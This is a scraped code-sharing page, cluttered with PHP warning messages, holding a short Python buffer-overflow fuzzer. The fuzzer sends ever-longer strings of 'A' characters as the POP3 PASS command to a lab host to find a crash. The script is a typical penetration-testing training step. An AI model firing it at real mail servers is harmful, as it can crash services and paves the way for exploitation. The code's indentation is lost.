Warning: PHP Request Startup: Invalid date.timezone value '', using 'UTC' instead in Unknown on line 0

Warning: PHP Request Startup: Session ini settings cannot be changed after headers have already been sent in Unknown on line 0

Warning: session_start(): Session cannot be started after headers have already been sent in /home/admud64/mrleet.com/user/database_connection.php on line 5
buffer_overflow scripts windows_bo_fuzzer.py ~ MrLeet

Title: buffer_overflow scripts windows_bo_fuzzer.pyAuthor: ajayverma
#!/usr/bin/python
import socket

#create an array of buffers, while incrementing them

buffer=["A"]
counter=100
while len(buffer) <=30:
buffer.append("A"*counter)
counter=counter+200

for string in buffer:
print "Fuzzing PASS with %s bytes" % len(string)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.11.13.62',110))
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS ' + string + '\r\n')
s.send('QUIT\r\n')
s.close()


Submitted On: 2019-06-25 10:11:33




Warning: PHP Startup: Invalid date.timezone value '', using 'UTC' instead in Unknown on line 0